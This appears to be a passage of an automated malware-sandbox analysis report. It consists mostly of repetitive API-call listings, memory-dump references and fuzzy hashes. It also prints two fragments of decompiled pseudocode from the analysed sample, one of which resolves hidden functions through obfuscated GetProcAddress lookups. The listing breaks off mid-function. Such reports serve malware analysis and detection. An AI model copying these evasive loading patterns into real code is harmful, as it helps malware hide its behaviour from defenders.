                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F720C
                                                                                                                          • int.LIBCPMT ref: 6E2F7223
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F7246
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F725D
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F727D
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F728A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          • Opcode ID: 0de72ef037a7b9925b504ad5cf4c284006501fa2bf917d22b4daf09f1fcf612c
                                                                                                                          • Instruction ID: 7c2238c44bc3b1d6534d72e1aac41ee486082b59864a7eed0508c3d1a081e5bd
                                                                                                                          • Opcode Fuzzy Hash: 0de72ef037a7b9925b504ad5cf4c284006501fa2bf917d22b4daf09f1fcf612c
                                                                                                                          • Instruction Fuzzy Hash: C601AD7A94051ECBCF01DBE8D954AEEF77BBF55328F140909E4116B280EFB09A078791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 6E343EB7
                                                                                                                          • __fassign.LIBCMT ref: 6E344096
                                                                                                                          • __fassign.LIBCMT ref: 6E3440B3
                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E3440FB
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E34413B
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E3441E7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4031098158-0
                                                                                                                          • Opcode ID: d1fdb368105d89d3c5cea3fe61950ced31138887487f81bb52601d4c92bbb7dc
                                                                                                                          • Instruction ID: 53b5f2012b41bcbf5df9f914ef8d6de5caeefdc29f25c854ce1944074aced04e
                                                                                                                          • Opcode Fuzzy Hash: d1fdb368105d89d3c5cea3fe61950ced31138887487f81bb52601d4c92bbb7dc
                                                                                                                          • Instruction Fuzzy Hash: D1D188B5D00259DFCF15CFE8D8809EDBBB9BF49304F24416AE855BB242D731AA46CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 04CD1AF6
                                                                                                                          • SysAllocString.OLEAUT32(0070006F), ref: 04CD1B0A
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 04CD1B1C
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD1B84
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD1B93
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD1B9E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 344208780-0
                                                                                                                          • Opcode ID: a585d89e421fbebb4774f70c72daa0e7ba6c1e155d5f8bc3583d99bc472f781d
                                                                                                                          • Instruction ID: ca09dd64cb4d302b17899ae0367a18cc0bfa26e895b10f25404d0ac41e29964d
                                                                                                                          • Opcode Fuzzy Hash: a585d89e421fbebb4774f70c72daa0e7ba6c1e155d5f8bc3583d99bc472f781d
                                                                                                                          • Instruction Fuzzy Hash: EB415176D00609AFDB01DFB8D844A9FB7BAEF89310F184465EA11EB110DA71EE05CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _t23;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				_Unknown_base(*)()* _t28;
                                                                                                                          				intOrPtr _t30;
                                                                                                                          				_Unknown_base(*)()* _t32;
                                                                                                                          				intOrPtr _t33;
                                                                                                                          				_Unknown_base(*)()* _t35;
                                                                                                                          				intOrPtr _t36;
                                                                                                                          				_Unknown_base(*)()* _t38;
                                                                                                                          				intOrPtr _t39;
                                                                                                                          				_Unknown_base(*)()* _t41;
                                                                                                                          				intOrPtr _t44;
                                                                                                                          				struct HINSTANCE__* _t48;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          
                                                                                                                          				_t54 = E04CD75F6(0x20);
                                                                                                                          				if(_t54 == 0) {
                                                                                                                          					_v8 = 8;
                                                                                                                          				} else {
                                                                                                                          					_t23 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t1 = _t23 + 0x4cde11a; // 0x4c44544e
                                                                                                                          					_t48 = GetModuleHandleA(_t1);
                                                                                                                          					_t26 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t2 = _t26 + 0x4cde782; // 0x7243775a
                                                                                                                          					_v8 = 0x7f;
                                                                                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                          					 *(_t54 + 0xc) = _t28;
                                                                                                                          					if(_t28 == 0) {
                                                                                                                          						L8:
                                                                                                                          						E04CD4AAB(_t54);
                                                                                                                          					} else {
                                                                                                                          						_t30 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          						_t5 = _t30 + 0x4cde76f; // 0x614d775a
                                                                                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                          						 *(_t54 + 0x10) = _t32;
                                                                                                                          						if(_t32 == 0) {
                                                                                                                          							goto L8;
                                                                                                                          						} else {
                                                                                                                          							_t33 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          							_t7 = _t33 + 0x4cde4ce; // 0x6e55775a
                                                                                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                          							 *(_t54 + 0x14) = _t35;
                                                                                                                          							if(_t35 == 0) {
                                                                                                                          								goto L8;
                                                                                                                          							} else {
                                                                                                                          								_t36 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          								_t9 = _t36 + 0x4cde406; // 0x4e6c7452
                                                                                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                          								 *(_t54 + 0x18) = _t38;
                                                                                                                          								if(_t38 == 0) {
                                                                                                                          									goto L8;
                                                                                                                          								} else {
                                                                                                                          									_t39 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          									_t11 = _t39 + 0x4cde792; // 0x6c43775a
                                                                                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                          									 *(_t54 + 0x1c) = _t41;
                                                                                                                          									if(_t41 == 0) {
                                                                                                                          										goto L8;
                                                                                                                          									} else {
                                                                                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                          										_t44 = E04CD9269(_t54, _a8);
                                                                                                                          										_v8 = _t44;
                                                                                                                          										if(_t44 != 0) {
                                                                                                                          											goto L8;
                                                                                                                          										} else {
                                                                                                                          											 *_a12 = _t54;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _v8;
                                                                                                                          			}



















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04CD101C,?,00000001,?,?,00000000,00000000), ref: 04CD485C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04CD487E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04CD4894
                                                                                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04CD48AA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04CD48C0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04CD48D6
                                                                                                                            • Part of subcall function 04CD9269: memset.NTDLL ref: 04CD92E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1886625739-0
                                                                                                                          • Opcode ID: 37f50aaeab08cddc98aa9e111fcdcf1d0c51f969487a24551fe0699e2edf927a
                                                                                                                          • Instruction ID: 791aeef685178b4130c00b76b41fd50e0a581b947cbb5220b06a924363356828
                                                                                                                          • Opcode Fuzzy Hash: 37f50aaeab08cddc98aa9e111fcdcf1d0c51f969487a24551fe0699e2edf927a
                                                                                                                          • Instruction Fuzzy Hash: 1A216DB560160AAFEB20DF6AC888E6AB7FCEF043447014026E746DB241E774FE05CB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1C08
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1C12
                                                                                                                          • int.LIBCPMT ref: 6E2F1C29
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1C63
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1C83
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1C90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: da1413f6a893ac32e845b8a21f46742aee31ce831caafa88dde58bad43ed0b7b
                                                                                                                          • Instruction ID: 0d75b17f64ac06641db8b3497d804984624a49afead1c4603efbc1d322d797b5
                                                                                                                          • Opcode Fuzzy Hash: da1413f6a893ac32e845b8a21f46742aee31ce831caafa88dde58bad43ed0b7b
                                                                                                                          • Instruction Fuzzy Hash: 830100BA84012EDBCF01DBE4C954AFEF7BBAF85368F550909D4106B280DF70994ACB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7C7C
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7C86
                                                                                                                          • int.LIBCPMT ref: 6E2F7C9D
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7CD7
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7CF7
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7D04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 080848d69f58dab10b8489b60c508cdc8f8c165192027e693558dd9a462f5674
                                                                                                                          • Instruction ID: cc581544ff86141b4563209b6858e6934785fcd912c1b8d53094611991f7e678
                                                                                                                          • Opcode Fuzzy Hash: 080848d69f58dab10b8489b60c508cdc8f8c165192027e693558dd9a462f5674
                                                                                                                          • Instruction Fuzzy Hash: 9601E17684011EDBCF01DBE4D954AEEB77BAF45318F110809D8116B280DF709A428790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7456
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7460
                                                                                                                          • int.LIBCPMT ref: 6E2F7477
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F74B1
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F74D1
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F74DE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 85aaab1e82187447ee7a033bc178877127b7007bc9ef56edc7bbaa9afa07f4e1
                                                                                                                          • Instruction ID: 2b7b8ccc61e030d957775d1b2774614a244b62386557589d4991b7cb6aee6379
                                                                                                                          • Opcode Fuzzy Hash: 85aaab1e82187447ee7a033bc178877127b7007bc9ef56edc7bbaa9afa07f4e1
                                                                                                                          • Instruction Fuzzy Hash: 2C01ED7A98012EDBCF01DBE4C854AEEBB7BBF81728F200819D4106B280DF7099428790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F74EB
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F74F5
                                                                                                                          • int.LIBCPMT ref: 6E2F750C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7546
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7566
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7573
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 1a00421639c339c1aebc265fc0b454cdadba553ffb56c188d0178811a39b217e
                                                                                                                          • Instruction ID: b82f4670d209038b8352715112bb72dd2458a00e8eac5cb0eb66d45ee070ed96
                                                                                                                          • Opcode Fuzzy Hash: 1a00421639c339c1aebc265fc0b454cdadba553ffb56c188d0178811a39b217e
                                                                                                                          • Instruction Fuzzy Hash: 2101AD7A94051EDBCF01DBE4D894AEEB7BBBF46329F140909D8106B290DF709A068B81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7D11
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7D1B
                                                                                                                          • int.LIBCPMT ref: 6E2F7D32
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7D6C
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7D8C
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7D99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 1a79e79dfe4a57cbb0d1d86125635912f662eae84c58c6756ad805b699da4f3b
                                                                                                                          • Instruction ID: 8609645fc1fab9a0ddb29177abadb4d6f17950649ffe4db8eac57ab26e47d6a3
                                                                                                                          • Opcode Fuzzy Hash: 1a79e79dfe4a57cbb0d1d86125635912f662eae84c58c6756ad805b699da4f3b
                                                                                                                          • Instruction Fuzzy Hash: 7E01EDBA85011EDBCF01DBE4CD54AFEB77BAF81718F640A09D4116B280DF7099068780
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7580
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F758A
                                                                                                                          • int.LIBCPMT ref: 6E2F75A1
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F75DB
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F75FB
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7608
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7A28
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7A32
                                                                                                                          • int.LIBCPMT ref: 6E2F7A49
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7A83
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7AA3
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7AB0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1B73
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1B7D
                                                                                                                          • int.LIBCPMT ref: 6E2F1B94
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1BCE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1BEE
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1BFB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F73C1
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F73CB
                                                                                                                          • int.LIBCPMT ref: 6E2F73E2
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F741C
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F743C
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7449
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7BE7
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7BF1
                                                                                                                          • int.LIBCPMT ref: 6E2F7C08
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7C42
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7C62
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7C6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7869
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7873
                                                                                                                          • int.LIBCPMT ref: 6E2F788A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F78C4
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F78E4
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F78F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7993
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F799D
                                                                                                                          • int.LIBCPMT ref: 6E2F79B4
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F79EE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7A0E
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7A1B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E04CD282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                          				signed int _v8;
                                                                                                                          				char _v12;
                                                                                                                          				signed int* _v16;
                                                                                                                          				char _v284;
                                                                                                                          				void* __esi;
                                                                                                                          				char* _t59;
                                                                                                                          				intOrPtr* _t60;
                                                                                                                          				intOrPtr _t64;
                                                                                                                          				char _t65;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				intOrPtr _t69;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				void* _t73;
                                                                                                                          				signed int _t81;
                                                                                                                          				void* _t91;
                                                                                                                          				void* _t92;
                                                                                                                          				char _t98;
                                                                                                                          				signed int* _t100;
                                                                                                                          				intOrPtr* _t101;
                                                                                                                          				void* _t102;
                                                                                                                          
                                                                                                                          				_t92 = __ecx;
                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                          				_t98 = _a16;
                                                                                                                          				if(_t98 == 0) {
                                                                                                                          					__imp__( &_v284,  *0x4cdd37c);
                                                                                                                          					_t91 = 0x80000002;
                                                                                                                          					L6:
                                                                                                                          					_t59 = E04CD1922( &_v284,  &_v284);
                                                                                                                          					_a8 = _t59;
                                                                                                                          					if(_t59 == 0) {
                                                                                                                          						_v8 = 8;
                                                                                                                          						L29:
                                                                                                                          						_t60 = _a20;
                                                                                                                          						if(_t60 != 0) {
                                                                                                                          							 *_t60 =  *_t60 + 1;
                                                                                                                          						}
                                                                                                                          						return _v8;
                                                                                                                          					}
                                                                                                                          					_t101 = _a24;
                                                                                                                          					if(E04CD5C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                                                                                          						L27:
                                                                                                                          						E04CD4AAB(_a8);
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					_t64 =  *0x4cdd2b0; // 0x58b9b38
                                                                                                                          					_t16 = _t64 + 0xc; // 0x58b9c06
                                                                                                                          					_t65 = E04CD1922(_t64,  *_t16);
                                                                                                                          					_a24 = _t65;
                                                                                                                          					if(_t65 == 0) {
                                                                                                                          						L14:
                                                                                                                          						_t29 = _t101 + 0x14; // 0x102
                                                                                                                          						_t33 = _t101 + 0x10; // 0x3d04cdc0
